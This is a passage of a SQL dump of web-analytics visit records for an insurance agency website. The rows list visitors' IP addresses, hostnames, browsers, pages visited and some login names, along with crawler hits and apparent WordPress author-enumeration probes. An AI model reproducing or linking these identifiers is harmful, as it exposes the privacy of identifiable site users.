11','us','','','','','','','0','0',0),(26987,'0b_bc281c3a087a90509793d5c991618eb8','1462811192','67.85.210.17','ool-4355d211.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win8','Chrome 50','us','1600 x 900','','','','','','0','0',0),(26990,'0b_bc281c3a087a90509793d5c991618eb8','1462811193','67.85.210.17','ool-4355d211.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 50','us','1600 x 900','','','','','','0','0',0),(26993,'0b_bc281c3a087a90509793d5c991618eb8','1462811249','67.85.210.17','ool-4355d211.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 50','us','1600 x 900','','','','','','0','0',0),(26994,'0b_bc281c3a087a90509793d5c991618eb8','1462811264','67.85.210.17','ool-4355d211.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win8','Chrome 50','us','1600 x 900','','','','Biny1280','','0','51',0),(26997,'0b_0946756c81c895afc6aeef4ff7a684e0','1462811493','37.115.184.150','37-115-184-150-broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0 ; .NET CLR 2.0.50215; SL Commerce Client v1.0; Tablet PC 2.0','http://arkkivoltti.net/','',0,'WinVista','IE 7','','','','','','','','0','0',0),(27000,'0b_0946756c81c895afc6aeef4ff7a684e0','1462811493','37.115.184.150','37-115-184-150-broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0 ; .NET CLR 2.0.50215; SL Commerce Client v1.0; Tablet PC 2.0','http://idc.com.ua/','',0,'WinVista','IE 7','','','','','','','','0','0',0),(27002,'0b_992539174ed58782cad2ba76b819fca6','1462812086','69.164.140.246','69.164.140.246.xchangetele.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','1600 x 900','','','','zenwirth','','0','51',0),(27003,'0b_992539174ed58782cad2ba76b819fca6','1462812086','69.164.140.246','69.164.140.246.xchangetele.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','1600 x 900','','','','zenwirth','','0','51',0),(27006,'0b_992539174ed58782cad2ba76b819fca6','1462812087','69.164.140.246','69.164.140.246.xchangetele.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1600 x 900','','','','zenwirth','','0','0',0),(27009,'0b_5631dad95bbecb32035ec31d1da235ad','1462812440','69.30.213.82','69.30.213.82','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(27011,'0b_5631dad95bbecb32035ec31d1da235ad','1462812451','69.30.213.82','69.30.213.82','/about-us/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(27014,'0b_5631dad95bbecb32035ec31d1da235ad','1462812462','69.30.213.82','69.30.213.82','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(27017,'0b_5631dad95bbecb32035ec31d1da235ad','1462812473','69.30.213.82','69.30.213.82','/igo/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(27018,'0b_5631dad95bbecb32035ec31d1da235ad','1462812486','69.30.213.82','69.30.213.82','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(27021,'0b_5631dad95bbecb32035ec31d1da235ad','1462812498','69.30.213.82','69.30.213.82','/insentives/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(27024,'0b_5631dad95bbecb32035ec31d1da235ad','1462812510','69.30.213.82','69.30.213.82','/licensing-contracting/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(27026,'0b_5631dad95bbecb32035ec31d1da235ad','1462812521','69.30.213.82','69.30.213.82','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(27027,'0b_e454f9184e5e1b76fda3d7e37bb2e0fb','1462813416','208.43.225.84','54.e1.2bd0.ip4.static.sl-reverse.com','/robots.txt','Mozilla/5.0 (compatible; SiteExplorer/1.0b; +http://siteexplorer.info/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(27030,'0b_9408753ee9f92cbd439a45aa963fa735','1462813706','192.3.83.123','192-3-83-123-host.colocrossing.com','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:29.0) Gecko/20100101 Firefox/29.0','','',0,'MacOSX','Firefox 29','us','','','','','','','0','0',0),(27032,'0b_4fd5f62766316a24c81344d32dd6f513','1462813714','23.82.40.101','c1101.ballighomail.info','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:29.0) Gecko/20100101 Firefox/29.0','','',0,'MacOSX','Firefox 29','en','','','','','','','0','0',0),(27035,'0b_04be8c97bbf17d774253ef5d2359f7a5','1462813760','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(27038,'0b_04be8c97bbf17d774253ef5d2359f7a5','1462813770','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(27039,'0b_04be8c97bbf17d774253ef5d2359f7a5','1462813798','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(27042,'0b_04be8c97bbf17d774253ef5d2359f7a5','1462813799','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(27045,'0b_13cc54cd49690d533a788114cfc63b53','1462814177','144.76.8.132','static.132.8.76.144.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(27048,'0b_04be8c97bbf17d774253ef5d2359f7a5','1462814177','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(27050,'0b_13cc54cd49690d533a788114cfc63b53','1462814180','144.76.8.132','static.132.8.76.144.clients.your-server.de','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(27051,'0b_ae33c25a4070571c2778d107029dc234','1462814539','52.71.155.178','nat-service.aws.kontera.com','/term-quotes/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25','','',0,'MacOSX','Safari 8','','','','','','','','0','0',0),(27054,'0b_ae33c25a4070571c2778d107029dc234','1462814539','52.71.155.178','nat-service.aws.kontera.com','/agent-tools/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25','','',0,'MacOSX','Safari 8','','','','','','','','0','0',0),(27057,'0b_da3b5e05e20a241bc5152085bc044603','1462814649','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/forms/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','roisy','','0','0',0),(27059,'0b_da3b5e05e20a241bc5152085bc044603','1462814657','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/forms/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','roisy','','0','51',0),(27060,'0b_da3b5e05e20a241bc5152085bc044603','1462814658','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','roisy','','0','0',0),(27063,'0b_da3b5e05e20a241bc5152085bc044603','1462814662','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','roisy','','0','51',0),(27065,'0b_da3b5e05e20a241bc5152085bc044603','1462814721','108.58.88.178','ool-6c3a58b2.static.optonline.net','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','roisy','','0','51',0),(27068,'0b_da3b5e05e20a241bc5152085bc044603','1462814728','108.58.88.178','ool-6c3a58b2.static.optonline.net','/life-product-search/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/carriers/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','roisy','','0','51',0),(27069,'0b_da3b5e05e20a241bc5152085bc044603','1462814741','108.58.88.178','ool-6c3a58b2.static.optonline.net','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/life-product-search/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','roisy','','0','51',0),(27072,'0b_04be8c97bbf17d774253ef5d2359f7a5','1462814746','108.58.88.178','ool-6c3a58b2.static.optonline.net','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(27074,'0b_da3b5e05e20a241bc5152085bc044603','1462814776','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/carriers/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','roisy','','0','51',0),(27075,'0b_da3b5e05e20a241bc5152085bc044603','1462814778','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','roisy','','0','0',0),(27077,'0b_04be8c97bbf17d774253ef5d2359f7a5','1462814843','108.58.88.178','ool-6c3a58b2.static.optonline.net','/?page_id=171?a=pwdreset','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/carriers/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','51',0),(27078,'0b_04be8c97bbf17d774253ef5d2359f7a5','1462814928','108.58.88.178','ool-6c3a58b2.static.optonline.net','/members/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/?page_id=171?a=pwdreset','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','51',0),(27081,'0b_da3b5e05e20a241bc5152085bc044603','1462814948','108.58.88.178','ool-6c3a58b2.static.optonline.net','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','roisy','','0','51',0),(27083,'0b_da3b5e05e20a241bc5152085bc044603','1462814957','108.58.88.178','ool-6c3a58b2.static.optonline.net','/life-product-search/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/carriers/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','roisy','','0','51',0),(27084,'0b_04be8c97bbf17d774253ef5d2359f7a5','1462815006','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','51',0),(27086,'0b_04be8c97bbf17d774253ef5d2359f7a5','1462815007','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(27089,'0b_da3b5e05e20a241bc5152085bc044603','1462815147','108.58.88.178','ool-6c3a58b2.static.optonline.net','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/life-product-search/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','roisy','','0','51',0),(27092,'0b_da3b5e05e20a241bc5152085bc044603','1462815150','108.58.88.178','ool-6c3a58b2.static.optonline.net','/life-product-search/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/carriers/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','roisy','','0','51',0),(27093,'0b_da3b5e05e20a241bc5152085bc044603','1462815166','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/life-product-search/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','roisy','','0','51',0),(27095,'0b_531ec2d2e62ea2b3159d915c5d2c5280','1462816296','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(27096,'0b_531ec2d2e62ea2b3159d915c5d2c5280','1462816296','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(27098,'0b_531ec2d2e62ea2b3159d915c5d2c5280','1462816298','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(27099,'0b_531ec2d2e62ea2b3159d915c5d2c5280','1462816302','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(27102,'0b_531ec2d2e62ea2b3159d915c5d2c5280','1462816315','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(27105,'0b_5f71a00889ec5b2727cbfee2599756ed','1462818887','75.99.37.250','ool-4b6325fa.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','0',0),(27107,'0b_5f71a00889ec5b2727cbfee2599756ed','1462818889','75.99.37.250','ool-4b6325fa.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','0',0),(27110,'0b_5f71a00889ec5b2727cbfee2599756ed','1462818892','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(27113,'0b_5f71a00889ec5b2727cbfee2599756ed','1462818901','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(27114,'0b_e30dc9ae3c0ac509aadd945901e8bbee','1462819426','216.244.79.218','hosted.at.admixhosting.com','/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','','','','','','','','0','0',0),(27116,'0b_4143880bd11e68782220f25d4b66278d','1462820768','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(27119,'0b_eb6b4dbd4358fc76499afea1596bb147','1462821396','62.210.152.87','62-210-152-87.rev.poneytelecom.eu','/?author=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','eu','','','','','','','0','0',0),(27120,'0b_eb6b4dbd4358fc76499afea1596bb147','1462821396','62.210.152.87','62-210-152-87.rev.poneytelecom.eu','/author/admin/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','eu','','','','','','','0','0',0),(27123,'0b_eb6b4dbd4358fc76499afea1596bb147','1462821398','62.210.152.87','62-210-152-87.rev.poneytelecom.eu','/?author=2','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','eu','','','','','','','0','0',0),(27126,'0b_85304161c2ad749485c8916219c81dfc','1462823519','70.199.96.211','211.sub-70-199-96.myvzw.com','/','Mozilla/5.0 (Linux; Android 6.0.1; SM-G925V Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36','android-app://com.google.android.googlequicksearchbox','',0,'Android 6','Chrome 50 Mobile','us','360 x 640','','','','','','0','0',0),(27128,'0b_85304161c2ad749485c8916219c81dfc','1462823521','70.199.96.211','211.sub-70-199-96.myvzw.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Linux; Android 6.0.1; SM-G925V Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36','http://www.empireins.com/','',0,'Android 6','Chrome 50 Mobile','us','360 x 640','','','','','','0','0',0),(27131,'0b_85304161c2ad749485c8916219c81dfc','1462823531','70.199.96.211','211.sub-70-199-96.myvzw.com','/contact/','Mozilla/5.0 (Linux; Android 6.0.1; SM-G925V Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36','http://www.empireins.com/','',0,'Android 6','Chrome 50 Mobile','us','360 x 640','','','','','','0','0',0),(27132,'0b_063da64d6a11972a317c68415734bec5','1462824166','85.211.199.246','85-211-199-246.dynamic.dsl.as9105.com','/meet-the-eib-team/&sa=U&ved=0ahUKEwjwksHP5M3MAhUsIcAKHRYIDk0QFggfMAI&usg=AFQjCNEItgYZn3tsS2RsB5BdBWgAYwVxeA','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','','','','','','','','0','0',0),(27135,'0b_063da64d6a11972a317c68415734bec5','1462824172','85.211.199.246','85-211-199-246.dynamic.dsl.as9105.com','/contact/&sa=U&ved=0ahUKEwjwksHP5M3MAhUsIcAKHRYIDk0QFggkMAM&usg=AFQjCNGX5Dtt5Os_DvJd-UNnNXv8zGwvZQ','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','','','','','','','','0','0',0),(27138,'0b_7b6bf5bd9419dfdcda36ef63f3f77d77','1462824197','62.24.252.133','host-62-24-252-133.as13285.net','/meet-the-eib-team/&sa=U&ved=0ahUKEwjwksHP5M3MAhUsIcAKHRYIDk0QFggfMAI&usg=AFQjCNEItgYZn3tsS2RsB5BdBWgAYwVxeA','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)','http://www.empireins.com/meet-the-eib-team/%26sa=U%26ved=0ahUKEwjwksHP5M3MAhUsIcAKHRYIDk0QFggfMAI%26usg=AFQjCNEItgYZn3tsS2RsB5BdBWgAYwVxeA','',0,'WinXP','IE 8','','','','','','','','0','0',0),(27140,'0b_7b6bf5bd9419dfdcda36ef63f3f77d77','1462824203','62.24.252.133','host-62-24-252-133.as13285.net','/robots.txt','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)','http://www.empireins.com/robots.txt','',0,'WinXP','IE 8','','','','','','','','0','0',0),(27143,'0b_7b6bf5bd9419dfdcda36ef63f3f77d77','1462824204','62.24.252.133','host-62-24-252-133.as13285.net','/contact/&sa=U&ved=0ahUKEwjwksHP5M3MAhUsIcAKHRYIDk0QFggkMAM&usg=AFQjCNGX5Dtt5Os_DvJd-UNnNXv8zGwvZQ','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)','http://www.empireins.com/contact/%26sa=U%26ved=0ahUKEwjwksHP5M3MAhUsIcAKHRYIDk0QFggkMAM%26usg=AFQjCNGX5Dtt5Os_DvJd-UNnNXv8zGwvZQ','',0,'WinXP','IE 8','','','','','','','','0','0',0),(27146,'0b_7d7e1b4834cdab64b1f8bf5df601aecc','1462824757','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(27149,'0b_da3b5e05e20a241bc5152085bc044603','1462824891','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/carriers/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','roisy','','0','0',0),(27150,'0b_4a9717c184e7a825a8e3e204425052ff','1462825189','24.90.91.19','cpe-24-90-91-19.nyc.res.rr.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 50','us','1920 x 1080','Google','','','','','0','0',0),(27153,'0b_4a9717c184e7a825a8e3e204425052ff','1462825194','24.90.91.19','cpe-24-90-91-19.nyc.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(27155,'0b_4a9717c184e7a825a8e3e204425052ff','1462825211','24.90.91.19','cpe-24-90-91-19.nyc.res.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(27156,'0b_4a9717c184e7a825a8e3e204425052ff','1462825240','24.90.91.19','cpe-24-90-91-19.nyc.res.rr.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 50','us','1920 x 1080','Google','','','','','0','51',0),(27159,'0b_4a9717c184e7a825a8e3e204425052ff','1462825242','24.90.91.19','cpe-24-90-91-19.nyc.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(27162,'0b_4a9717c184e7a825a8e3e204425052ff','1462825266','24.90.91.19','cpe-24-90-91-19.nyc.res.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','51',0),(27165,'0b_a05f1525ae0dcf1bd3113c6252ff9904','1462825403','66.249.66.21','crawl-66-249-66-21.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(27168,'0b_4a9717c184e7a825a8e3e204425052ff','1462825496','24.90.91.19','cpe-24-90-91-19.nyc.res.rr.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','Wperl','','0','51',0),(27170,'0b_beff10ae38d8d208ec2d6cfb8d28e305','1462825820','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(27171,'0b_32e77a865553fcf231e1ca89c02af58e','1462825996','169.54.233.117','75.e9.36a9.ip4.static.sl-reverse.com','/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(27174,'0b_da3b5e05e20a241bc5152085bc044603','1462827213','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win7','Chrome 50','us','1920 x 